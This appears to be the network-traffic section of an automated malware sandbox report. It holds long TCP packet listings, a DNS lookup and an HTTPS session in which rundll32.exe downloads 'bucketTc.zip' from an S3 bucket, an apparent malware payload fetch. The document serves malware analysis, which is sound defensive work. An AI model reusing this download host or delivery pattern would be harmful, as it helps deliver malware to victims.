                                        Mar 7, 2024 10:36:11.820535898 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.820578098 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.820606947 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.820622921 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.820645094 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.820661068 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.821386099 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.821439981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.821470022 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.821485996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.821510077 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.821526051 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.822268963 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.822319031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.822349072 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.822365046 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.822387934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.822387934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.822413921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.823347092 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.823390007 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.823415995 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.823431969 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.823455095 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.823472023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.824357033 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.824405909 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.824436903 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.824453115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.824476004 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.824496031 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.825094938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.825144053 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.825170994 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.825181961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.825208902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.825227022 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.825946093 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.825989962 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.826018095 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.826034069 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.826056957 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.826057911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.826081991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.826698065 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.826755047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.826781034 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.826793909 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.826822042 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.826842070 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.827543974 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.827585936 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.827615023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.827630043 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.827655077 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.827673912 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.828486919 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.828532934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.828561068 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.828577995 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.828602076 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.828619003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.829444885 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.829494953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.829523087 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.829534054 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.829559088 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.829579115 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.830219984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.830264091 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.830288887 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.830300093 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.830326080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.830347061 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.159742117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.159866095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160041094 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160041094 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160073042 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160501003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160523891 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160547972 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160579920 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160605907 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160610914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160636902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160670996 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160696030 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160744905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160803080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160830021 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160849094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160876036 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.161088943 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.162604094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.162664890 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.162695885 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.162713051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.162735939 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.162754059 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.163445950 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.163511992 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.163532019 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.163544893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.163573027 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.163592100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.164854050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.164910078 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.164942980 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.164954901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.164984941 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.165236950 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.487505913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.487539053 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.487587929 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.487675905 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.487761974 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.487801075 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.487823963 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.488358021 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.488416910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.488449097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.488464117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.488492012 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.488511086 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.489737034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.489789963 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.489931107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.489945889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.490384102 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.490434885 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.490466118 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.490482092 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.490511894 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.490528107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.491724014 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.491767883 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.491847038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.491859913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.492490053 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.492537022 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.492564917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.492577076 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.492610931 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.494247913 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815051079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815115929 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815193892 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815242052 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815279007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815504074 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815557003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815574884 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815597057 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815628052 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815649986 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816203117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816271067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816279888 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816298008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816343069 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816343069 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816421032 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816477060 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816498041 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816513062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816540003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816557884 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816829920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816879034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816899061 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816916943 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816945076 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816963911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.817558050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.817600012 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.817631960 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.817645073 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.817670107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.817686081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.818264008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.818315029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.818342924 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.818355083 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.818386078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.818406105 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.819236994 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.819278955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.819314003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.819324970 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.819353104 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.819370031 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820058107 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820101976 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820138931 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820152044 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820183039 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820203066 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820772886 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820818901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820858955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820871115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820904016 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.821491003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.821537971 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.821563959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.821577072 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.821607113 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.821624994 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.822520018 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.822568893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.822616100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.822633028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.822660923 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.823535919 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.823580980 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.823613882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.823626041 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.823653936 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.823674917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.824181080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.824240923 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.824246883 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.824265003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.824302912 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.824328899 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.825315952 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.825357914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.825398922 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.825409889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.825438976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.825458050 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.145068884 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.145138979 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.145168066 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.145236969 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.145282030 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.145282030 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.146301031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.146373034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.146392107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.146406889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.146435022 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.146456003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.147195101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.147259951 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.147274971 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.147289038 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.147320986 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.147337914 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.148258924 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.148305893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.148332119 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.148344040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.148382902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.148382902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.149365902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.149415016 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.149437904 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.149450064 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.149485111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.149485111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.150372028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.150420904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.150444984 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.150461912 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.150484085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.150484085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.150510073 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.151216030 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.151268005 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.151295900 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.151308060 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.151335001 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.151351929 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.152090073 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.152139902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.152172089 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.152183056 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.152211905 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.152256966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153214931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153258085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153289080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153300047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153325081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153345108 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153616905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153657913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153690100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153701067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153724909 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153742075 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153778076 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153829098 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153846025 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153857946 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153882980 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153903008 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.154412031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.154465914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.154483080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.154494047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.154530048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.154530048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.154601097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.154652119 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.177697897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.177767992 CET4434972916.12.1.14192.168.2.4

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 7, 2024 10:36:06.706239939 CET4949953192.168.2.41.1.1.1
                                        Mar 7, 2024 10:36:06.913742065 CET53494991.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Mar 7, 2024 10:36:06.706239939 CET192.168.2.41.1.1.10xcb18Standard query (0)bucreate203920233.s3.sa-east-1.amazonaws.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)bucreate203920233.s3.sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.14A (IP address)IN (0x0001)false
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.201A (IP address)IN (0x0001)false
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.30A (IP address)IN (0x0001)false
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.18A (IP address)IN (0x0001)false
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.234.15A (IP address)IN (0x0001)false
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.185A (IP address)IN (0x0001)false
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.62A (IP address)IN (0x0001)false
                                        Mar 7, 2024 10:36:06.913742065 CET1.1.1.1192.168.2.40xcb18No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.58A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • bucreate203920233.s3.sa-east-1.amazonaws.com

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.44972916.12.1.144437080C:\Windows\System32\rundll32.exe
                                        TimestampBytes transferredDirectionData
                                        2024-03-07 09:36:08 UTC336OUTGET /bucketTc.zip HTTP/1.1
                                        Accept: */*
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: bucreate203920233.s3.sa-east-1.amazonaws.com
                                        Connection: Keep-Alive
                                        2024-03-07 09:36:08 UTC423INHTTP/1.1 200 OK
                                        x-amz-id-2: gyUr0PILlOmdnJindTeRa3bpY/CY6Vsse3m9G/Vv5uXrFe6vJriNL1YpVf/DGkVFjEu1pXxDUzA=
                                        x-amz-request-id: B8T3D388MQA8FFY9
                                        Date: Thu, 07 Mar 2024 09:36:09 GMT
                                        Last-Modified: Wed, 06 Mar 2024 05:27:41 GMT
                                        ETag: "b952a1b57aae836929b07ee6b6306c61"
                                        x-amz-server-side-encryption: AES256
                                        Accept-Ranges: bytes
